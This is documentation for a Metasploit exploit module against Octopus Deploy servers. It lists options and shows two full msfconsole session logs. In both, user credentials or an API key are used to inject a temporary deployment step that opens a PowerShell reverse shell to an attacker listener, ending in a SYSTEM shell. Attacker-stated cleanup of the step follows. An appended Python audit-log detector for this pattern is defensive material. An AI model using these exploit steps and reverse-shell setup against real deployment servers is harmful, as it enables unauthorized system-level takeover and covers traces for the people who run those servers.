metasploit-framework/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md

Vulnerable Application

Install Octopus Deploy server

Create a test user and a team. The team should have the "Project contributor" and "Project deployer" roles, or just "System administrator". Add your test user to the team.

Create an API key

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/windows/http/octopusdeploy_deploy
  4. Do: set PATH, RHOST, RPORT, and SSL if needed
  5. Do: set STEPNAME if desired
  6. Do: set USERNAME and PASSWORD or just APIKEY
  7. Do: run
  8. You should get a shell.

Options

APIKEY

API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination.

USERNAME

Username of the Octopus Deploy user.

PASSWORD

Password of the Octopus Deploy user.

PATH

Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus".

STEPNAME

Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided.

SSL

Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic.

Scenarios

Octopus Deploy Server 3.16.0

Getting a privileged shell on Octopus Deploy server using administrative credentials.

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set USERNAME ODUser
USERNAME => ODUser
msf exploit(octopusdeploy_deploy) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step r4XAJc to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.2
[*] Creating release
[*] Release Releases-79 created
[*] Deploying TestProject2 version 0.0.2 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step r4XAJc from TestProject2
[*] Step r4XAJc deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59346) at 2017-05-15 19:54:01 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025358-22>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025358-22> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) >

Getting a privileged shell on Octopus Deploy server using a sufficiently privileged API key.

msf > use exploit/windows/http/octopusdeploy_deploy
msf exploit(octopusdeploy_deploy) > set PATH /octoADTest
PATH => /octoADTest
msf exploit(octopusdeploy_deploy) > set RHOST 10.0.0.12
RHOST => 10.0.0.12
msf exploit(octopusdeploy_deploy) > set RPORT 80
RPORT => 80
msf exploit(octopusdeploy_deploy) > set payload windows/powershell_reverse_tcp
payload => windows/powershell_reverse_tcp
msf exploit(octopusdeploy_deploy) > set LHOST 10.0.0.7
LHOST => 10.0.0.7
msf exploit(octopusdeploy_deploy) > set APIKEY API-FCIQ773M43RKNC4I9KZHQTABC
APIKEY => API-FCIQ773M43RKNC4I9KZHQTABC
msf exploit(octopusdeploy_deploy) > set STEPNAME shell
STEPNAME => shell
msf exploit(octopusdeploy_deploy) > run

[*] Started reverse SSL handler on 10.0.0.7:4444 
[*] Getting available projects
[*] Using project TestProject2
[*] Getting steps to TestProject2
[*] Adding step shell to TestProject2
[*] Getting available channels
[*] Using channel Default
[*] Getting next version
[*] Using version 0.0.3
[*] Creating release
[*] Release Releases-80 created
[*] Deploying TestProject2 version 0.0.3 to TestEnv
[*] Getting updated steps to TestProject2
[*] Deleting step shell from TestProject2
[*] Step shell deleted
[*] Powershell session session 1 opened (10.0.0.7:4444 -> 10.0.0.12:59373) at 2017-05-15 19:59:55 -0500

Windows PowerShell running as user WIN-OL1HR5KBTPD$ on WIN-OL1HR5KBTPD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Octopus\ADTest\Work\20170516025952-24>whoami
nt authority\system
PS C:\Octopus\ADTest\Work\20170516025952-24> exit

[*] 10.0.0.12 - Powershell session session 1 closed.  Reason: Died from Errno::ECONNRESET

msf exploit(octopusdeploy_deploy) >
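For defenders, both runs above leave the same trail: a step is added to a project, a release is created and deployed, and the step is deleted again within seconds. The following is an added example, not part of the module or its documentation, that flags that chain in audit records. It assumes the records have already been normalized into a hypothetical `time`/`user`/`project`/`action`/`step` schema; the action names and the sample events are constructed for illustration.

```python
from datetime import datetime, timedelta

# Hypothetical normalized action names; map your own audit export onto them.
SEQUENCE = ["step_added", "release_created", "deployment_queued", "step_removed"]

def find_transient_step_deployments(events, window=timedelta(minutes=10)):
    """Return (user, project, step, start, end) for each add -> release ->
    deploy -> remove chain by one user on one project inside `window`."""
    findings, progress = [], {}  # progress: (user, project) -> tracking state
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["user"], ev["project"])
        if ev["action"] == "step_added":
            progress[key] = {"idx": 1, "start": ev["time"], "step": ev["step"]}
            continue
        state = progress.get(key)
        if state is None:
            continue
        if ev["time"] - state["start"] > window:
            del progress[key]  # chain took too long to count as transient
            continue
        if ev["action"] != SEQUENCE[state["idx"]]:
            continue  # unrelated event, keep waiting for the next stage
        if ev["action"] == "step_removed":
            if ev["step"] != state["step"]:
                continue  # a different step was removed
            findings.append((*key, state["step"], state["start"], ev["time"]))
            del progress[key]
        else:
            state["idx"] += 1
    return findings

def _ev(time, user, project, action, step=None):
    return {"time": datetime.fromisoformat(time), "user": user,
            "project": project, "action": action, "step": step}

# Constructed sample records; user, project and step names reuse the scenario above.
SAMPLE_EVENTS = [
    _ev("2017-05-15T19:53:50", "ODUser", "TestProject2", "step_added", "r4XAJc"),
    _ev("2017-05-15T19:53:52", "ODUser", "TestProject2", "release_created"),
    _ev("2017-05-15T19:53:58", "ODUser", "TestProject2", "deployment_queued"),
    _ev("2017-05-15T19:54:05", "ODUser", "TestProject2", "step_removed", "r4XAJc"),
    # Ordinary change: the step is added and deployed but never removed.
    _ev("2017-05-16T09:00:00", "builder", "WebApp", "step_added", "Run tests"),
    _ev("2017-05-16T09:05:00", "builder", "WebApp", "release_created"),
    _ev("2017-05-16T09:06:00", "builder", "WebApp", "deployment_queued"),
]

if __name__ == "__main__":
    print(find_transient_step_deployments(SAMPLE_EVENTS))
```

A hit is a lead to review alongside who owns the account or API key, since the module works with any identity that holds the roles listed under Vulnerable Application.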